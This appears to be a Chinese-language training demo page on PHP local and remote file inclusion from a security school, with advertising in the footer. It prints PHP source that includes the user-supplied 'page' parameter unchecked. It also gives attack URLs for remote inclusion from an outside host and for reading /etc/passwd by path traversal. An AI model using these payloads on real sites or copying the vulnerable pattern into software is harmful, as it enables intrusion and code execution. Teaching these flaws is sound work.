文件包含演示-本地文件包含

我是被包含的文件的内容,
我来自于 home.php
/home/wwwroot/www.nanhack.com/payload/include/home.php

从PHP5.2开始allow_url_include就默认为Off了,而allow_url_fopen一直是On的。
远程文件包含,需要配置allow_url_include,allow_url_fopen为on

http://upload.nanhack.com/include/index.php?page=http://www.hacker.wang/php.txt

包含ect/passwd

http://upload.nanhack.com/include/index.php?page=../../../../etc/passwd

# 程序源码如下:
<?php if(isset($_GET['page'])){
$path = $_GET['page'];
    include $path;
}else{
    include "home.php";
}
?>

必火安全学院

报名微信:nvhack



© Copyright 2021 版权所有(一极教育科技有限公司)   津公网安备 12011602000477号 津ICP备17008032号-2   网络安全培训、企业合作、院校合作: 15320004362(手机同微信)